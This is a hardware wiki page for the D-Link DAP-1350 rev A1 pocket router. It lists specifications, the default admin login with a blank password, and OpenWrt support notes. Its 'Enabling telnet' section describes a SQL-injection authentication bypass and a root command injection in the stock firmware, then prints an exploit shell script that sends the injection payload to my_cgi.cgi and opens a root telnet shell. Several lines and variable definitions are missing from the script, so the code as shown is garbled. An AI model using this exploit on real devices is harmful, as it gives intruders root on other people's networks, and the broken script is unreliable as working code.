See 'WikiDevi' @ the Internet Archive (MW XML, Files, Images)
upgraded MW to 1.30 - maybe things are slightly less broken

D-Link DAP-1350 rev A1

From WikiDevi
Jump to: navigation, search

D-Link DAP-1350 A1
Availability: now

Manuf/OEM/ODM Cameo

FCC approval date: 15 September 2009
Country of manuf.: China

Amazon image

B003Q9AZHU (Flag of the United States.svg, On Amazon, On CCC)
multiple revisions of this device, use caution

Type: wireless router, access point

Industry Canada ID: 4216A-AP1350

Power: 5 VDC, 2.5 A
Connector type: barrel

CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB
8,388,608 B
65,536 Kib
8,192 KiB
64 Mib
0.00781 GiB
(Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB
33,554,432 B
262,144 Kib
32,768 KiB
256 Mib
0.0313 GiB
(ESMT M12L128168A-7T × 2)

Expansion IFs: USB 2.0
USB ports: 1

WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none

ETH chip1: Ralink RT3052
LAN speed: 10/100
LAN ports: 1


Stock FW OS: Linux

Third party firmware supported: OpenWrt

Default SSID: dlink (38 addl. devices)
Default IP address:
the IP is used by 62 additional devices
of which 62 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 314 additional devices
of which 179 are D-Link devices

802dot11 OUI: 00:18:E7 (10 E, 20 W, 2008)
Ethernet OUI: 00:18:E7 (10 E, 20 W, 2008)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.

Wireless N Pocket Router & Access Point

Product page • Interface emulator

Forum threads[edit]

OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken.
You can build your own firmware now or wait for the Attitude Adjustment release.

Enabling telnet[edit]

A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.

A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.


# DAP-1350 telnetd, by brynet.
# This effect all stock firmware images for the device.
# Tested on OpenBSD.

if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1;
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# user_name=admin
# user_pwd=';select 1;--
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"

echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Authenticated."
	echo "Failed."
	exit 1;
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"

echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2; nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Root shell, okey doke."
	telnet $host
	echo "No root.. sorry, heh."
	exit 1;

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

    $ ./ dlinkap #
    Root shell, okey doke.
    Connected to dlinkap.
    Escape character is '^]'.
    ... motd/etc.

The factory set root password is unknown, so no login(1) process is started.
You must run the exploit script each time the device is powered on.